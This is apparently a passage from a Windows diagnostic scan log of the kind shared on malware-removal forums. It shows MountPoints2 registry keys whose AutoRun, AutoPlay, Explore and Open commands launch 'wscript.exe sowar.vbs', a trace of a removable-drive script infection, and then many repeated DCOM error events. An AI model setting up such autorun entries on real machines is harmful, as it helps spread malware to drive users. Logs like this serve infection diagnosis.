HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721757-16c6-11dd-bf56-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 01 00 00 00 08 06 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\\ -> Open -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\AutoPlay\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\AutoPlay\Command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\AutoPlay\Command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\AutoRun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\AutoRun\\Extended ->  -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\AutoRun\command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\AutoRun\command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\Explore\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\Explore\Command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\Explore\Command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\Open\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\Open\Command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\Open\Command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\Open\Default\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f8c397a2-5dea-11dd-8fc5-001d09963004}\Shell\Open\Default\\ -> 1 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{09f6f50d-241e-11dd-8f8f-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{09f6f50d-241e-11dd-8f8f-001d09963004}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{09f6f50d-241e-11dd-8f8f-001d09963004}\\Generation -> 4 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{09f6f50e-241e-11dd-8f8f-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{09f6f50e-241e-11dd-8f8f-001d09963004}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{09f6f50e-241e-11dd-8f8f-001d09963004}\\Generation -> 4 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{52f03b12-1b12-11dd-8f7e-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{52f03b12-1b12-11dd-8f7e-001d09963004}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{52f03b12-1b12-11dd-8f7e-001d09963004}\\Generation -> 3 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{85e0ebf7-22dc-11dd-8f86-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{85e0ebf7-22dc-11dd-8f86-001d09963004}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{85e0ebf7-22dc-11dd-8f86-001d09963004}\\Generation -> 4 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{85e0ebf8-22dc-11dd-8f86-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{85e0ebf8-22dc-11dd-8f86-001d09963004}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{85e0ebf8-22dc-11dd-8f86-001d09963004}\\Generation -> 4 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2c-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2c-1af0-11dd-8f7c-806d6172696f}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2c-1af0-11dd-8f7c-806d6172696f}\\Generation -> 3 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2d-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2d-1af0-11dd-8f7c-806d6172696f}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2d-1af0-11dd-8f7c-806d6172696f}\\Generation -> 3 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2e-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2e-1af0-11dd-8f7c-806d6172696f}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2e-1af0-11dd-8f7c-806d6172696f}\\Generation -> 3 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2f-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2f-1af0-11dd-8f7c-806d6172696f}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe2f-1af0-11dd-8f7c-806d6172696f}\\Generation -> 3 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe30-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe30-1af0-11dd-8f7c-806d6172696f}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe30-1af0-11dd-8f7c-806d6172696f}\\Generation -> 3 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe31-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe31-1af0-11dd-8f7c-806d6172696f}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{977fbe31-1af0-11dd-8f7c-806d6172696f}\\Generation -> 3 -> 
< EventViewer Logs > -> Errors and Warnings -> Description
System - Error - 8/17/2008 4:39:07 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:08 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:09 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:10 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:11 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:12 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:16 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:17 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:18 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:20 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:21 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:22 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:23 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:24 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:25 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:26 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:27 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:28 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:29 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:30 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:31 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:32 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:38 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:39 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:40 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:41 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:42 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:43 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:44 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:45 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:46 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:47 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:48 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:49 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:50 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:51 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:52 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:53 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:54 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:55 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:56 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:57 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:58 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:39:59 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:00 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:01 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:02 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:03 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:04 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:05 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:06 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:07 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:09 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:10 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:11 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:12 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:13 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:14 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:15 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:16 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:17 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:18 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:19 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:20 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:21 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:22 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:23 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:24 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:25 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:26 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:27 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:28 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:29 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:30 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:31 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:32 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:33 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:34 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:35 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:36 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:37 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:38 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:39 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:40 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:41 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:42 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:43 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:44 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:45 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:46 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:47 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:48 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:49 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:50 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:51 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:52 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:53 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:54 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:55 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:56 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:57 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:58 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:40:59 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:00 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:01 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:02 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:03 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:04 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:05 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:06 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:07 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:08 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:09 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:10 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:11 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:12 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:13 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:14 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:15 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/17/2008 4:41:16 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:22 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:23 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:24 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:25 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:26 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:27 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:28 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:31 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:32 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:33 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:35 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:36 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:37 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:38 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:39 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
